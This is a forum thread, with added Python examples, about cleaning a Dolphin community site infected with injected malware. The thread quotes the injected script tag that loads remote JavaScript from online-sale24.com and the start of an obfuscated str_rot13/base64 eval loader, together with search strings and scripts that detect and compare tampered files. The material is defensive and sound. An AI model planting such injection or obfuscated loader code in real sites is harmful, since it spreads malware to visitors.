Hi, I installed and activated exif on my server to test Dolphin Trident... but now, since I did that, my other website on the same server doesn't show the images that members upload on the Dolphin 7.1 website...
www.enwoye.com
It's weird because the avatar still shows but not the profile photo...
Someone got a solution?
|
Not sure of that problem Joe but when I looked at your site, the link to a member profile, it opened an ad site...
ManOfTeal.COM a Proud UNA site, six years running strong! |
So I got a virus on my server?
I know that sometimes a popup opens when you click on a link on my website... but I was thinking it's only me because maybe a virus or spyware is on my PC... but you said that you see that too... so maybe it's on the server...
|
Yes, you've got the virus.
The image isn't shown because, when the image is displayed, the following code is output:
<script type="text/javascript" src="http://online-sale24.com/1.js"></script>
which prevents the image from showing.
I would suggest changing FTP/cPanel passwords immediately; in the future, try not to save passwords in FTP clients and/or browsers which store passwords in clear text or using weak encryption. Ask everyone who could have access to the site to check their computers for viruses with the latest antivirus database. Then clean your site of the virus.
Rules → http://www.boonex.com/terms |
OK, and how can I get rid of this virus on the server? Without reinstalling everything, please ;) |
You need to remove this malicious code from all files. It's easier to restore the site from the backup.
It's better to do it as soon as possible, because your site can be added to blacklists by search engines and antiviruses; removing the site from these lists isn't easy.
Rules → http://www.boonex.com/terms |
I don't have a recent backup... how can I find which files are infected? Is there any website antivirus scan software? |
I would suggest asking hosting support; it may be that they have some tools for this.
Rules → http://www.boonex.com/terms |
I'm my own hosting service... I've got a dedicated server :( |
You have 2 options:
1. Download the whole site and run a search for the string "online-sale24" with a program like FileSeek or something similar.
2. You will need to ssh into the server and run this:
grep -rl "online-sale24" /path/to/dolphin
It will list all the files that match; then you can edit them one by one.
so much to do.... |
Well, I tried but I found nothing... I think that the virus is in encoded code... Why doesn't Dolphin have a function to check the files to see which ones are modified? So you can approve those that you modified for a specific mod... and re-upload those that you didn't modify... Many big scripts have this function to check the integrity of each file. |
Look at the top of your templates _header.html
There should not be anything before the line that starts with <!DOCTYPE
Looks like you have two script lines there that don't belong there that contain online-sale24
https://www.deanbassett.com |
Well, I already checked in all _header.html and _sub_header.html
in both base and the template I use
didn't find anything :(
I think I got a serious hack :(
Deano, I trust you so I can give you the FTP access by PM to FTP in and check if you find something...
I also added an antivirus on the server... and it found nothing :(
GOD please help me :)
|
Send me your info. I will take a look.
https://www.deanbassett.com |
Ok. Took a couple of days to find it.
You had 40 files, mostly index.php files throughout the site that contained encoded script. The start of the code looked like this.
@assert(str_rot13('riny(onfr64_qrpbqr(
The reason you could not find it using a standard text search for online-sale24 was that it was encoded.
I could not find much on a Google search for this. The only thing I could find were a couple of references to similar attacks on WordPress sites. So I am not positive how it got on the site.
I do suggest, now that I am finished, that you change your FTP, cPanel and any other passwords to your site ASAP.
Oh and actually, before you access your own site with FTP or anything else, you should actually scan your own home computer with Malwarebytes https://www.malwarebytes.org/mwb-download/ just in case your own home computer was the source of the infection.
https://www.deanbassett.com |
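Why the plain-text search came up empty, and how a scan can decode before matching, as an added example (not code from the thread and not the method actually used to clean the site). It assumes the wrapper has the `str_rot13('...')` shape quoted above with a base64 literal inside; `peel`, `scan`, `demo_scan` and the sample files are constructed for illustration, and the sample payload is a harmless comment.

```python
import base64
import codecs
import re
import tempfile
from pathlib import Path

# String literal handed to str_rot13(), the wrapper quoted in the post above.
ROT13_CALL = re.compile(r"str_rot13\(\s*(['\"])(.*?)\1", re.S)
# Base64 literal handed to base64_decode() once the ROT13 layer is removed.
B64_CALL = re.compile(r"base64_decode\(\s*['\"]([A-Za-z0-9+/=]+)['\"]")
SUSPECT_EXT = {".php", ".htm", ".html"}


def peel(source):
    """Return every decoded layer hidden behind str_rot13/base64_decode."""
    layers = []
    for match in ROT13_CALL.finditer(source):
        inner = codecs.decode(match.group(2), "rot13")
        layers.append(inner)
        for blob in B64_CALL.findall(inner):
            try:
                layers.append(base64.b64decode(blob).decode("utf-8", "replace"))
            except ValueError:
                pass  # not valid base64; keep only the ROT13 layer
    return layers


def scan(root, indicator):
    """Map each file with hidden layers to whether they contain the indicator."""
    hits = {}
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in SUSPECT_EXT:
            layers = peel(path.read_text(errors="replace"))
            if layers:
                name = path.relative_to(root).as_posix()
                hits[name] = any(indicator in layer for layer in layers)
    return hits


def demo_scan():
    """Scan a constructed tree; also report what a plain text search sees."""
    blob = base64.b64encode(b"/* constructed sample: online-sale24 */").decode()
    hidden = codecs.encode('eval(base64_decode("%s"));' % blob, "rot13")
    with tempfile.TemporaryDirectory() as tmp:
        bad = Path(tmp, "modules", "index.php")
        bad.parent.mkdir()
        bad.write_text("<?php @assert(str_rot13('%s')); ?>\n" % hidden)
        Path(tmp, "clean.php").write_text("<?php echo 'hello'; ?>\n")
        return "online-sale24" in bad.read_text(), scan(tmp, "online-sale24")
```

Any file that `scan` returns deserves a manual look even when the indicator is absent, because a wrapped `eval` has no business in an index file whatever it decodes to.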
Hello,
To solve such problems the File System Monitor can be very helpful. It can not only notify you if files have been changed but also provide a list of files changed. But of course, in order for this to happen, the module must be installed beforehand.
And yes, at this moment you should scan your PC for malware, and then change all access credentials. Also, I personally do not recommend using the "save password" feature of any tools (browser, FTP client, etc.) ever. Very often passwords get compromised by being stolen from such saved places.
Best Regards AntonLV - http://www.boonex.com/market/posts/AntonLV |
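The integrity check asked for earlier in the thread can also be done after the fact by hashing the live site against a clean copy, shown here as an added example (not the File System Monitor module and not code from the thread). It assumes a clean copy of the same release can be unpacked beside the live tree; the function names, the `approved` list and the sample file names are constructed for illustration.

```python
import hashlib
import tempfile
from pathlib import Path


def manifest(root):
    """Map each file path (relative to root) to its SHA-256 digest."""
    root = Path(root)
    return {
        p.relative_to(root).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
        for p in sorted(root.rglob("*")) if p.is_file()
    }


def compare(reference, live, approved=()):
    """Diff the live site against a known-clean reference copy.

    `approved` names files changed on purpose (installed mods); they are
    listed apart so they are not mistaken for tampering.
    """
    ref, cur = manifest(reference), manifest(live)
    changed = {f for f in ref.keys() & cur.keys() if ref[f] != cur[f]}
    return {
        "modified": sorted(changed - set(approved)),
        "approved": sorted(changed & set(approved)),
        "added": sorted(cur.keys() - ref.keys()),
        "missing": sorted(ref.keys() - cur.keys()),
    }


def demo_compare():
    """Run compare() on two constructed trees (file names are made up)."""
    clean = {"index.php": "<?php // home ?>", "modules/index.php": "<?php ?>",
             "templates/site.css": "body{}", "inc/util.php": "<?php // util ?>"}
    with tempfile.TemporaryDirectory() as tmp:
        for tree in ("reference", "live"):
            for name, text in clean.items():
                path = Path(tmp, tree, name)
                path.parent.mkdir(parents=True, exist_ok=True)
                path.write_text(text)
        live = Path(tmp, "live")
        (live / "modules/index.php").write_text("<?php /* altered */ ?>")
        (live / "templates/site.css").write_text("body{color:teal}")  # admin's mod
        (live / "cache.php").write_text("<?php ?>")  # file not in the package
        (live / "inc/util.php").unlink()
        return compare(Path(tmp, "reference"), live, approved=["templates/site.css"])
```

Files under `modified` and `added` are the ones to inspect or replace from the clean copy; user uploads and caches will show up under `added` and need to be judged by location and content.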
OK, I scanned and got rid of all viruses with malware software... changed passwords... and finally got rid of him... but today he came back... Can you tell me what you did to get rid of it? I have to remove it again :(
I know I must format my PC because not even any antivirus can find this hacker... so I need some time before being able to format my PC... finish my downloads... and complete the open tabs in my Firefox... after that I will be able to format my PC
|
So should I only search for @assert(str_rot13('riny(onfr64_qrpbqr( in all PHP files on my server, or is it an SQL search string I must do? |
The files are the only place I found it. It's best to limit the search to just @assert(str_rot13
I see your site is infected again.
Did you change your passwords and scan your computer as I suggested?
You would also need to get rid of any local copies of your site you have as well as any backups because they could also have this problem. You need to create new backups after you get rid of the problem. You can't keep any old copies.
https://www.deanbassett.com |
Yes, I scanned for viruses, installed malware antivirus and also Komodo firewall and antivirus... changed passwords...
but he came back... so I will have to scan my website again... I hope it's the same @assert(str_rot13('riny(onfr64_qrpbqr( string he uses... it will be easier to find :(
|
I tried to do a search but there is no result now... maybe he changed the code line for the hack... can you tell me which files were infected... so I will take a look to see the new string he added to my code... |
I did not keep the files I cleaned, so I do not have an exact list.
Pretty much all of them were index.php and index.htm files throughout the entire site in all folders.
https://www.deanbassett.com |